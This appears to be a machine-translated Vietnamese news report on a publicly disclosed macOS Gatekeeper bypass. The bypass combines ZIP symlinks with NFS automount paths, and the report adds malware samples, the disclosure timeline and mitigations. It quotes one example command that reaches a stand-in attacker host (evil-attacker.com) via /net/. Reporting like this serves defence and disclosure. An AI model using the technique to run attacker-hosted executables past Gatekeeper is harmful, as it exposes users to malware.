Các nhà nghiên cứu an ninh mạng từ Intego đang cảnh báo về khả năng khai thác tích cực một lỗ hổng bảo mật chưa được vá trong các chi tiết tính năng bảo mật macOS Gatekeeper của Apple và PoC đã được tiết lộ công khai vào cuối tháng trước.
GateKeeper là một tính năng bảo mật được tích hợp trong Apple macOS, thực thi ký mã và xác minh các ứng dụng đã tải xuống trước khi cho phép chúng chạy, giúp người dùng bảo vệ hệ thống của họ khỏi phần mềm độc hại và phần mềm độc hại khác.
Điều đó có nghĩa là, nếu bạn tải xuống một ứng dụng từ Internet, GateKeeper sẽ chỉ cho phép nó thực thi mà không có bất kỳ cảnh báo nào nếu nó đã được ký với chứng chỉ do Apple cấp hợp lệ, nếu không sẽ nhắc bạn cho phép hoặc từ chối thực thi.
Tuy nhiên, Gatekeeper đã được thiết kế để coi cả ổ đĩa ngoài (USB hoặc ổ cứng) và chia sẻ mạng là “vị trí an toàn” từ đó người dùng có thể chạy bất kỳ ứng dụng nào mà không cần liên quan đến kiểm tra và nhắc nhở của GateKeeper.
Filippo Cavallarin, một nhà nghiên cứu bảo mật độc lập, cuối tháng trước đã công khai tiết lộ một cách để khai thác hành vi này bằng cách kết hợp nó với hai tính năng hợp pháp khác của hệ điều hành macOS, đó là:
kho lưu trữ zip có thể chứa các liên kết tượng trưng chỉ đến một vị trí tùy ý, bao gồm các điểm cuối tự động và
tính năng tự động trên macOS có thể tự động gắn kết chia sẻ mạng từ máy chủ từ xa chỉ bằng cách truy cập vào đường dẫn “đặc biệt”, bắt đầu bằng “/ net /. “
“Ví dụ: ls /net/evil-attacker.com/ Sharedfolder / sẽ khiến HĐH đọc nội dung của ‘sharedfolder’ trên máy chủ từ xa (evil-attacker.com) bằng NFS,” Cavallarin giải thích trong một bài đăng trên blog.
Như thể hiện trong video trình diễn, Cavallarin đã tạo một tệp ZIP có liên kết tượng trưng đến chia sẻ mạng do kẻ tấn công kiểm soát mà macOS sẽ tự động hóa.
Khi một nạn nhân mở kho lưu trữ ZIP và theo liên kết, anh ta sẽ điều hướng đến chia sẻ mạng do kẻ tấn công kiểm soát mà Gatekeeper tin tưởng, lừa nạn nhân chạy các tệp thực thi độc hại mà không có bất kỳ cảnh báo nào.
Tuy nhiên, các mẫu phần mềm độc hại mới được phát hiện không phải là tệp ZIP, mà là tệp hình ảnh đĩa (với .dmg), cho thấy “các nhà sản xuất phần mềm độc hại đang thử nghiệm xem liệu lỗ hổng của Cavallarin có hoạt động với hình ảnh đĩa không.”
Cavallarin có trách nhiệm báo cáo phát hiện của mình cho Apple vào ngày 22 tháng 2 nhưng đã quyết định công khai vào cuối tháng trước sau khi công ty không khắc phục được vấn đề trong thời hạn 90 ngày tiết lộ và bắt đầu bỏ qua email của mình.
Cho đến khi Apple khắc phục vấn đề này, nhà nghiên cứu khuyên các quản trị viên mạng nên chặn truyền thông NFS bằng địa chỉ IP bên ngoài và đối với người dùng gia đình, điều quan trọng là không mở tệp đính kèm email từ một nguồn không xác định, đáng ngờ hoặc không đáng tin cậy.